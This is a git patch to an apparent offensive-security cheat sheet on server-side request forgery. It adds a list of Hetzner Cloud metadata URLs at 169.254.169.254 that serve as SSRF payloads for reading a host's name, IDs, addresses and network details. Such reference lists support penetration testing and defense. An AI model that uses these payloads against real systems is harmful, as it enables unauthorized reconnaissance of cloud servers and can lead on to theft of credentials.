From 3c9fdec3da62f2b18411510c864d4a44964fa9a4 Mon Sep 17 00:00:00 2001 From: bsysop Date: Thu, 4 Apr 2024 23:43:34 -0300 Subject: [PATCH] Adding Hetzner Cloud Metadata URL https://docs.hetzner.cloud/#server-metadata --- Server Side Request Forgery/README.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index c6ce613..9287e44 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -805,6 +805,18 @@ http://100.100.100.200/latest/meta-data/instance-id http://100.100.100.200/latest/meta-data/image-id ``` +### SSRF URL for Hetzner Cloud + +```powershell +http://169.254.169.254/hetzner/v1/metadata +http://169.254.169.254/hetzner/v1/metadata/hostname +http://169.254.169.254/hetzner/v1/metadata/instance-id +http://169.254.169.254/hetzner/v1/metadata/public-ipv4 +http://169.254.169.254/hetzner/v1/metadata/private-networks +http://169.254.169.254/hetzner/v1/metadata/availability-zone +http://169.254.169.254/hetzner/v1/metadata/region +``` + ### SSRF URL for Kubernetes ETCD Can contain API keys and internal ip and ports